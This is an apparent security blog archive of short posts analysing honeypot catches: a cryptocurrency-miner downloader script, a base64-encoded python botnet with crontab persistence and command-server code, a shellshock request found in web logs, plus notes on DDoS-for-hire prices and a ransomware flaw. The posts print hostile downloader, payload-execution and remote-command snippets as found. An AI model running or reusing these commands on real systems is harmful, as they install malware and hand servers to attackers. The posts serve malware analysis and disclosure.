Archive for the ‘Bots’ Category

sumokoin – cryptonight

Tuesday, February 27th, 2018

Another honeypot-entry catched my eye. First, the attack
itself was unusual because the malware download was executed
by a small python script instead of just running wget or curl:

uname -a
rm -f /tmp/run
if [ ` getconf LONG_BIT ` -eq 64 ]
then u=””
else u=””
wget -O /tmp/run
curl -o /tmp/run
python -c “import urllib;urllib.urlretrieve(‘$u’,’/tmp/run’)”

Looking into the downloaded binary one finds this miner for
the cryptocoin “sumokoin” using the “cryptonight” algorithm:


(see )

Looking into the blockchainexplorer I currently find no transactions linked
to that address, but that may be because of the nature of sumokoin ..

Linux Botnet

Wednesday, January 10th, 2018

another nice ssh honeypot-catch:

uname nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CndoaWxlIFRydWU6CiAgICB0cnk6CiAgIC
dlKQogICAgZXhjZXB0OgogICAgICAgIHBhc3MKICAgIHRpbWUuc2xlZXAoMzAwKQ=='))" > /dev/null 2 >& 1 &

That downloads a base64-encoded complete python-program from

In that program a crontab-entry is made

   if runCodePath not in crontabData:
                f = open("/etc/crontab", "a+")
                f.write("\n0 */6 * * * root %s\n" % runCodePath)

then it loads data about the hacked server to the herder:

   my_data = {"key":d.get_key, "name":d.get_name, "os":d.get_platform, "core":d.get_core, "cpu":d.get_cpucount, "cpuuse":d.get_cpuuse, "status":d.get_status}
            f = urllib.urlopen(apiURL, urllib.urlencode(my_data))

and waits for commands:


  if data.has_key("download") and data["download"]:
                    DownExec(data["download"], task_id)
       if data.has_key("cmd") and data["cmd"]:
                    CmdExec(data["cmd"], task_id)

Wonder what would happen if the computer name would be a beef-xss hook or something..?

recently in the webserver log ..

Monday, August 17th, 2015

While strolling through the webserver-logs, I found this little asshole..: - - [16/Aug/2015:21:35:01 +0200] "GET /suspendedpage.cgi
HTTP/1.1" 404 494 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget;curl -O;fetch;lwp-download;perl;rm -rf;rm -rf*\"" installs an irc-connection and waits for commands like
portscan, tcpflood or a reverse shell ..

Looks like there are still servers out there which are vulnerable to shellshock ..

DDoS – cheaper than I thought..

Monday, September 29th, 2014

Recently I fell about an advertisement for a DDoS – Attack Service in the tor-network – it was way cheaper than I thought.

25 minutes of 150 Gbps costs only 15$; a silver paket for 1 hour is available for 20$ and a whole week with a hour/day downtime can be bought in a gold-paket for only 60$.  These darknets are really dark these days…

bitbucket decrypt bitcrypt

Friday, February 21st, 2014

The evil bitcrypt malware, which encrypts files on hijacked pc and offers the decryption key

for a payment of 260 € has a serious flaw in the encryption design, Heise reported.

Fabien Perigaud und Cedric Pernet from managed to find out that the used RSA-Key

had a length of 128 instead of 128 Byte; So they were able to crack the 426 bit key in 43 hours.

The free python-script is here available. Cool stuff 🙂